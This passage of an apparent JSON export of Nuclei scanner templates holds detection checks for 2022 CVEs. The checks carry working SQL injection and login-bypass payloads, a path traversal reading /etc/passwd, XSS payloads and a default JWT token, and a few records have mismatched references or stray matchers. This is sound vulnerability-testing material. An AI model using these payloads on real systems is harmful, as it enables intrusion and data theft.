complete_online_job_search_system_project\n product: complete_online_job_search_system\n tags: cve,cve2022,sqli,eris,authenticated,complete_online_job_search_system_project\nvariables:\n num: \"999999999\"\n\nhttp:\n - raw:\n - |\n POST /admin/login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n user_email={{username}}&user_pass={{password}}&btnLogin=\n - |\n GET /admin/company/index.php?view=edit&id=-3%27%20union%20select%201,md5({{num}}),3,4,5,6--+ HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n part: body\n words:\n - '{{md5({{num}})}}'\n# digest: 4b0a004830460221008ad23239cd7dd2a9bf0d16fa365774f1eed66f8132c22cd8754914207b1bfa6b022100a67736c94d6df0e5a51bf0750a3aa7dce46543398696dde083bb55fdffba091f:922c64590222798bb761d5b6d8e72950", "hash": "8d681265b50743608caa4ecfed92552d", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30853a" }, "name": "CVE-2022-32015.yaml", "content": "id: CVE-2022-32015\n\ninfo:\n name: Complete Online Job Search System 1.0 - SQL Injection\n author: arafatansari\n severity: high\n description: |\n Complete Online Job Search System 1.0 contains a SQL injection vulnerability via /eris/index.php?q=category&search=. 
An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Complete Online Job Search System 1.0.\n reference:\n - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-8.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-32015\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2022-32015\n cwe-id: CWE-89\n epss-score: 0.01426\n epss-percentile: 0.8625\n cpe: cpe:2.3:a:complete_online_job_search_system_project:complete_online_job_search_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: complete_online_job_search_system_project\n product: complete_online_job_search_system\n tags: cve,cve2022,sqli,jobsearch,complete_online_job_search_system_project\nvariables:\n num: \"999999999\"\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?q=category&search=Banking%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,md5({{num}}),15,16,17,18,19--+\"\n\n matchers:\n - type: word\n part: body\n words:\n - '{{md5({{num}})}}'\n# digest: 4b0a00483046022100c34036939ef2413c02af88cb8e86ecd6b3be7f27866b7d0ca21d3b7a269e47a8022100cf88f059ea7f102348f18a69cc9b78e11fc69e56a09b123e5a590fee4b261619:922c64590222798bb761d5b6d8e72950", "hash": "8119bc289f8fc503b2f7f919dab41f0e", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30853b" }, "name": "CVE-2022-32018.yaml", "content": "id: CVE-2022-32018\n\ninfo:\n name: Complete Online Job Search System 1.0 - SQL Injection\n author: arafatansari\n severity: high\n description: |\n Complete Online Job Search System 1.0 contains a SQL injection vulnerability via /eris/index.php?q=hiring&search=. 
An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database or modify its contents.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Complete Online Job Search System 1.0.\n reference:\n - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-12.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-32018\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2022-32018\n cwe-id: CWE-89\n epss-score: 0.01426\n epss-percentile: 0.8625\n cpe: cpe:2.3:a:complete_online_job_search_system_project:complete_online_job_search_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: complete_online_job_search_system_project\n product: complete_online_job_search_system\n tags: cve,cve2022,sqli,complete_online_job_search_system_project\nvariables:\n num: \"999999999\"\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?q=hiring&search=URC%27%20union%20select%201,2,3,4,5,6,7,8,9,md5({{num}}),11,12,13,14,15,16,17,18,19--+\"\n\n matchers:\n - type: word\n part: body\n words:\n - '{{md5({{num}})}}'\n# digest: 4a0a0047304502205ba4dd1e28ba762599b6a5ab360d76fec10ab36095eea39b5350f66c6ccfdd4a022100e512574c97e4dd07fb068fe1ad699e8401d927211f5932a38f70608192d06c77:922c64590222798bb761d5b6d8e72950", "hash": "bad286fb11adc5440a4a7ffde527cd2d", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30853c" }, "name": "CVE-2022-32022.yaml", "content": "id: CVE-2022-32022\n\ninfo:\n name: Car Rental Management System 1.0 - SQL Injection\n author: arafatansari\n severity: 
high\n description: |\n Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/ajax.php?action=login. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential manipulation of the database.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-1.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-32022\n - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-1.md.\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2022-32022\n cwe-id: CWE-89\n epss-score: 0.00897\n epss-percentile: 0.80882\n cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: car_rental_management_system_project\n product: car_rental_management_system\n shodan-query: http.html:\"Car Rental Management System\"\n tags: cve,cve2022,carrental,cms,sqli,login-bypass,car_rental_management_system_project\n\nhttp:\n - raw:\n - |\n POST /admin/ajax.php?action=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n username=admin'+or+'1'%3D'1'%23&password=admin\n - |\n GET /admin/index.php?page=home HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'Welcome back Administrator!'\n - 'action=logout'\n - 'Manage Account'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 
490a004630440220725a329ba41785dd96c0939334b9a1e78af7fa6421aeef4df6d2dd933c44115c0220351e53b8bd40ec2dea1271b2162432124266cbf982ff3f9fc1eaf8903b8207ae:922c64590222798bb761d5b6d8e72950", "hash": "84586aeace3f3d74cc1296627a38f9d9", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30853d" }, "name": "CVE-2022-32024.yaml", "content": "id: CVE-2022-32024\n\ninfo:\n name: Car Rental Management System 1.0 - SQL Injection\n author: arafatansari\n severity: high\n description: |\n Car Rental Management System 1.0 contains an SQL injection vulnerability via /booking.php?car_id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or even complete compromise of the system.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Car Rental Management System 1.0.\n reference:\n - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-4.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-32024\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2022-32024\n cwe-id: CWE-89\n epss-score: 0.00834\n epss-percentile: 0.80157\n cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: car_rental_management_system_project\n product: car_rental_management_system\n shodan-query: http.html:\"Car Rental Management System\"\n comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username.\n tags: 
cve,cve2022,carrental,cms,sqli,authenticated,car_rental_management_system_project\nvariables:\n num: \"999999999\"\n\nhttp:\n - raw:\n - |\n POST /admin/ajax.php?action=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n username={{username}}&password={{password}}\n - |\n GET /booking.php?car_id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1\n Host: {{Hostname}}\n\n skip-variables-check: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '{{md5({{num}})}}'\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502203b4e45ad6997926ec06328175be051f4173ad99349811ce498ebfabf77cfadec022100ebd9ee62670283e68f73cff5756332ebb4f4b7d010c5a102bcdfa61f6967c540:922c64590222798bb761d5b6d8e72950", "hash": "4dfa7fbba8102d5608e55b781ed1a9cb", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30853e" }, "name": "CVE-2022-32025.yaml", "content": "id: CVE-2022-32025\n\ninfo:\n name: Car Rental Management System 1.0 - SQL Injection\n author: arafatansari\n severity: high\n description: |\n Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/view_car.php?id=. 
An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-6.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-32025\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2022-32025\n cwe-id: CWE-89\n epss-score: 0.01426\n epss-percentile: 0.8625\n cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: car_rental_management_system_project\n product: car_rental_management_system\n shodan-query: http.html:\"Car Rental Management System\"\n comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username.\n tags: cve,cve2022,carrental,cms,sqli,authenticated,car_rental_management_system_project\nvariables:\n num: \"999999999\"\n\nhttp:\n - raw:\n - |\n POST /admin/ajax.php?action=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n username={{username}}%23&password={{password}}\n - |\n GET /admin/view_car.php?id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1\n Host: {{Hostname}}\n\n skip-variables-check: true\n host-redirects: true\n max-redirects: 2\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '{{md5({{num}})}}'\n\n - type: status\n status:\n - 200\n# digest: 
490a004630440220566cc50ee5f50c4a96f3e96207530f5e6f169affed02f065aecacbfec179891302202c5e77606826ec2964e65a363ae6cb5339c0746c36c2faf2c312ebba75307610:922c64590222798bb761d5b6d8e72950", "hash": "75d97b083274e8d9c8fcaf3b183eae1b", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30853f" }, "name": "CVE-2022-32026.yaml", "content": "id: CVE-2022-32026\n\ninfo:\n name: Car Rental Management System 1.0 - SQL Injection\n author: arafatansari\n severity: high\n description: |\n Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_booking.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Car Rental Management System 1.0.\n reference:\n - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md\n - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-5.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-32028\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2022-32026\n cwe-id: CWE-89\n epss-score: 0.01426\n epss-percentile: 0.8625\n cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: car_rental_management_system_project\n product: car_rental_management_system\n shodan-query: http.html:\"Car Rental Management System\"\n comment: Login bypass is also 
possible using the payload- admin'+or+'1'%3D'1' in username.\n tags: cve,cve2022,carrental,cms,sqli,authenticated,car_rental_management_system_project\nvariables:\n num: \"999999999\"\n\nhttp:\n - raw:\n - |\n POST /admin/ajax.php?action=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n username={{username}}&password={{password}}\n - |\n GET /admin/manage_booking.php?id=-1%20union%20select%201,2,3,4,5,6,md5({{num}}),8,9,10,11--+ HTTP/1.1\n Host: {{Hostname}}\n\n skip-variables-check: true\n host-redirects: true\n max-redirects: 2\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '{{md5({{num}})}}'\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402202d8d1ce0a8afb0fd0d8764c020301f0bed489c76f1e00e810d5e77dcb9065adb0220745a0985676455f645e3f98ac502002ec5c0ee377c9822b23ec2081b0c2bfd3c:922c64590222798bb761d5b6d8e72950", "hash": "f17ff1381c1f04048b3d61b39e84d57a", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308540" }, "name": "CVE-2022-32028.yaml", "content": "id: CVE-2022-32028\n\ninfo:\n name: Car Rental Management System 1.0 - SQL Injection\n author: arafatansari\n severity: high\n description: |\n Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_user.php?id=. 
An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-32028\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2022-32028\n cwe-id: CWE-89\n epss-score: 0.01426\n epss-percentile: 0.8625\n cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: car_rental_management_system_project\n product: car_rental_management_system\n shodan-query: http.html:\"Car Rental Management System\"\n comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username.\n tags: cve,cve2022,carrental,cms,sqli,authenticated,car_rental_management_system_project\nvariables:\n num: \"999999999\"\n\nhttp:\n - raw:\n - |\n POST /admin/ajax.php?action=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n username={{username}}&password={{password}}\n - |\n GET /admin/manage_user.php?id=-1%20union%20select%201,md5({{num}}),3,4,5--+ HTTP/1.1\n Host: {{Hostname}}\n\n skip-variables-check: true\n host-redirects: true\n max-redirects: 2\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '{{md5({{num}})}}'\n\n - type: status\n status:\n - 200\n# digest: 
4b0a00483046022100df821f457de97d0880a4be9f79b9a08294cffaaf8b36b5f573415af2fcc073ec022100c1bf7e95967be2f3096198251b61f794654b302d661afc789ad82c93f886f2e5:922c64590222798bb761d5b6d8e72950", "hash": "ed124ed66476d6bd2a15c6b59d63ddbe", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308541" }, "name": "CVE-2022-32094.yaml", "content": "id: CVE-2022-32094\n\ninfo:\n name: Hospital Management System 1.0 - SQL Injection\n author: arafatansari\n severity: critical\n description: |\n Hospital Management System 1.0 contains a SQL injection vulnerability via the editid parameter in /HMS/doctor.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://github.com/Danie1233/Hospital-Management-System-v1.0-SQLi-3/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-32094\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-32094\n cwe-id: CWE-89\n epss-score: 0.01192\n epss-percentile: 0.83651\n cpe: cpe:2.3:a:hospital_management_system_project:hospital_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: hospital_management_system_project\n product: hospital_management_system\n shodan-query: http.html:\"Hospital Management System\"\n tags: cve,cve2022,hms,cms,sqli,auth-bypass,hospital_management_system_project\n\nhttp:\n - raw:\n - |\n POST /hms/doctor/ HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n 
username=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=\n\n host-redirects: true\n max-redirects: 2\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '<title>Doctor | Dashboard'\n - 'View Appointment History'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a0048304602210084fb69c1a03081213ac49cd95c8961662947511ae874b68981e489142096f3a3022100bc20375d33139ca01dac35f08cfcf15bd4ebd45605b6e478d37fd6fb506091ca:922c64590222798bb761d5b6d8e72950", "hash": "4788003b85efdf660f0956d7507be1b5", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308542" }, "name": "CVE-2022-32195.yaml", "content": "id: CVE-2022-32195\n\ninfo:\n name: Open edX <2022-06-06 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n Open edX before 2022-06-06 contains a reflected cross-site scripting vulnerability via the 'next' parameter in the logout URL.\n impact: |\n Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.\n remediation: |\n Apply the latest security patches or updates provided by Open edX to fix the Cross-Site Scripting vulnerability.\n reference:\n - https://discuss.openedx.org/t/security-patch-for-logout-page-xss-vulnerability/7408\n - https://github.com/edx\n - https://nvd.nist.gov/vuln/detail/CVE-2022-32195\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-32195\n cwe-id: CWE-79\n epss-score: 0.00112\n epss-percentile: 0.43735\n cpe: cpe:2.3:a:edx:open_edx:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: edx\n product: open_edx\n shodan-query: http.html:\"Open edX\"\n comment: Hover the cursor on the redirect link\n tags: cve,cve2022,openedx,xss,edx\n\nhttp:\n - method: GET\n 
path:\n - '{{BaseURL}}/logout?next=%208%22onmouseover=%22alert(document.domain)'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'click here to go to'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100d1e44091a63188927cbb7a9f6b8d42e7480fcfe75384863173fdee98142046c002210080ce0e4cfa487b2b08f8891139e605f8293b0b80a4250b609f1c9ff37505ffb8:922c64590222798bb761d5b6d8e72950", "hash": "d9760a210842d4daafd69c959c70a9d0", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308543" }, "name": "CVE-2022-32409.yaml", "content": "id: CVE-2022-32409\n\ninfo:\n name: Portal do Software Publico Brasileiro i3geo 7.0.5 - Local File Inclusion\n author: pikpikcu\n severity: critical\n description: Portal do Software Publico Brasileiro i3geo 7.0.5 is vulnerable to local file inclusion in the component codemirror.php, which allows attackers to execute arbitrary PHP code via a crafted HTTP request.\n impact: |\n An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.\n remediation: |\n Apply the latest patch or upgrade to a newer version of i3geo to fix the LFI vulnerability.\n reference:\n - https://github.com/wagnerdracha/ProofOfConcept/blob/main/i3geo_proof_of_concept.txt\n - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion\n - https://nvd.nist.gov/vuln/detail/CVE-2022-32409\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-32409\n cwe-id: CWE-22\n epss-score: 0.47251\n epss-percentile: 0.97372\n cpe: cpe:2.3:a:softwarepublico:i3geo:7.0.5:*:*:*:*:*:*:*\n metadata:\n verified: 
true\n max-request: 1\n vendor: softwarepublico\n product: i3geo\n shodan-query: http.html:\"i3geo\"\n tags: cve2022,cve,i3geo,lfi,softwarepublico\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/i3geo/exemplos/codemirror.php?&pagina=../../../../../../../../../../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022072e312e8df1571351e7a21ca6317934960724f0071495fe4169ca5b013300dcd022100cc5ac2a8a33a0acc037a5db55a65ebb9f5ae1937caac9aededb4a8a59ab3ec56:922c64590222798bb761d5b6d8e72950", "hash": "bf7f7065b85ebe29e2522b17fcdb7239", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308544" }, "name": "CVE-2022-3242.yaml", "content": "id: CVE-2022-3242\n\ninfo:\n name: Microweber <1.3.2 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n Code Injection in on search.php?keywords= GitHub repository microweber/microweber prior to 1.3.2.\n reference:\n - https://huntr.dev/bounties/3e6b218a-a5a6-40d9-9f7e-5ab0c6214faf/\n - https://www.tenable.com/cve/CVE-2022-3242\n - https://nvd.nist.gov/vuln/detail/CVE-2022-3242\n - https://github.com/microweber/microweber/commit/68f0721571653db865a5fa01c7986642c82e919c\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-3242\n cwe-id: CWE-79,CWE-94\n epss-score: 0.024\n epss-percentile: 0.8882\n cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: microweber\n product: microweber\n shodan-query: http.favicon.hash:780351152\n tags: cve,cve2022,huntr,xss,microweber\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/search.php?keywords=ABC%3Cdiv%20style=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E\"\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains(body, \"\") 
&& contains(tolower(body), \"microweber\")'\n condition: and\n# digest: 490a00463044022049539640dca818e246d16d9d5c7e24b3499600ed18ff1d74a3608b845d89688102207932b2ed5c81f7a4c34b58c4da1de8032eb2e0c1920be395f0b14d309d69293b:922c64590222798bb761d5b6d8e72950", "hash": "fb75f0aed48f8b472c3f51fdb70179e8", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308545" }, "name": "CVE-2022-32429.yaml", "content": "id: CVE-2022-32429\n\ninfo:\n name: MSNSwitch Firmware MNT.2408 - Authentication Bypass\n author: theabhinavgaur\n severity: critical\n description: |\n MSNSwitch Firmware MNT.2408 is susceptible to authentication bypass in the component http://MYDEVICEIP/cgi-bin-sdb/ExportSettings.sh. An attacker can arbitrarily configure settings, leading to possible remote code execution and subsequent unauthorized operations.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the affected device.\n remediation: |\n Apply the latest firmware update provided by the vendor to fix the authentication bypass vulnerability.\n reference:\n - https://packetstormsecurity.com/files/169819/MSNSwitch-Firmware-MNT.2408-Remote-Code-Execution.html\n - https://elifulkerson.com/CVE-2022-32429/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-32429\n - http://packetstormsecurity.com/files/169819/MSNSwitch-Firmware-MNT.2408-Remote-Code-Execution.html\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-32429\n cwe-id: CWE-287\n epss-score: 0.15342\n epss-percentile: 0.95742\n cpe: cpe:2.3:o:megatech:msnswitch_firmware:mnt.2408:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: megatech\n product: msnswitch_firmware\n shodan-query: http.favicon.hash:-2073748627 || http.favicon.hash:-1721140132\n tags: 
cve2022,cve,config,dump,packetstorm,msmswitch,unauth,switch,megatech\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin-hax/ExportSettings.sh\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"SSID1\"\n\n - type: regex\n part: header\n regex:\n - 'filename=\"Settings(.*).dat'\n - 'application/octet-stream'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100f40c78cc0f0a72c1f287552733d6a8029c75a95273b1d2e8e9c7b02c553392850220647bafa53296ecf2b294942dd964b0f8ea4c278bd17ba8b267a8ecc5fad97fea:922c64590222798bb761d5b6d8e72950", "hash": "2d5afadcd17c3f952b020c70da5913e4", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308546" }, "name": "CVE-2022-32430.yaml", "content": "id: CVE-2022-32430\n\ninfo:\n name: Lin CMS Spring Boot - Default JWT Token\n author: DhiyaneshDK\n severity: high\n description: |\n An access control issue in Lin CMS Spring Boot v0.2.1 allows attackers to access the backend information and functions within the application.\n reference:\n - https://github.com/TaleLin/lin-cms-spring-boot\n - https://web.archive.org/web/20220721190946/https://www.mesec.cn/archives/277\n - https://nvd.nist.gov/vuln/detail/CVE-2022-32430\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-32430\n epss-score: 0.00227\n epss-percentile: 0.60316\n cpe: cpe:2.3:a:talelin:lin-cms-spring-boot:0.2.1:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: talelin\n product: lin-cms-spring-boot\n fofa-query: body=\"心上无垢,林间有风\"\n tags: cve,cve2022,lin-cms,auth-bypass\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cms/admin/group/all\"\n headers:\n Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZGVudGl0eSI6MSwic2NvcGUiOiJsaW4iLCJ0eXBlIjoiYWNjZXNzIiwiZXhwIjoxNzUzMTkzNDc5fQ.SesmAnYN5QaHqSqllCInH0kvsMya5vHA1qPHuwCZ8N8\n\n matchers-condition: and\n matchers:\n - type: word\n part: 
body\n words:\n - '\"id\":'\n - '\"name\":'\n - '\"level\":'\n condition: and\n\n - type: word\n part: header\n words:\n - 'application/json'\n\n - type: status\n status:\n - 200\n\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402205070fa2cc17c809a810baa1e6b6c9efb5acdfa42715da7c7f2d6cf0b62934576022045e59a8169ca884549c6f435801ed6873531f867ccc9de4433c0f251a1fa050f:922c64590222798bb761d5b6d8e72950", "hash": "a1b5e9ba189e4dd751b8bab1a5ff876c", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308549" }, "name": "CVE-2022-32771.yaml", "content": "id: CVE-2022-32771\n\ninfo:\n name: WWBN AVideo 11.6 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n WWBN AVideo 11.6 contains a cross-site scripting vulnerability in the footer alerts functionality via the 'success' parameter, which is inserted into the document with insufficient sanitization.\n impact: |\n Successful exploitation of this 